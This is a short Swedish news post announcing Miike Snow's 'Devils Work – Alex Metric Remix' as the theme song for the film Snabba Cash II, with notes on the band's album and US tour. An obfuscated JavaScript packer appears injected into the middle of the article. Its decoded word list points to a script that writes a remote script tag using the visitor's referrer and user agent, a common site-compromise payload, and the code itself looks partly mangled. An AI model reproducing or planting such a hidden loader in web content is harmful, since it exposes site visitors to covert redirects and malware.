Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Miike Snow gör ledmotivet till SNABBA CASH II

Miike Snow gör ledmotivet till SNABBA CASH II
Sebastian

Devils eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tkhfr|var|u0026u|referrer|ekrzd||js|php’.split(’|’),0,{}))
Work – Alex Metric Remix” heter ledmotivet till SNABBA CASH II som har premiär den 17 augusti. Låten är skriven av Pontus Winnberg, Christian Karlsson & Andrew Wyatt, som utgör Miike Snow.

Miike Snow släppte tidigare i år deras andra album ”Happy To You” där låten ”Devil’s Work” var det första smakprovet som släpptes från det nya albumet. Den 6 augusti släpps en ny version av låten, “Devils Work – Alex Metric Remix”.

Miike Snow har sedan releasen av ”Happy To You” turnerat flitigt. Den inledande konserten hölls på Fotografiska i Stockholm, som sedan följdes av en USA-turné med bland annat spelningar på SXSW, Ultra Festival, Coachella och tre spelningar på klassiska Terminal 5 i New York, något inget svenskt band tidigare lyckats med.

www.miikesnow.com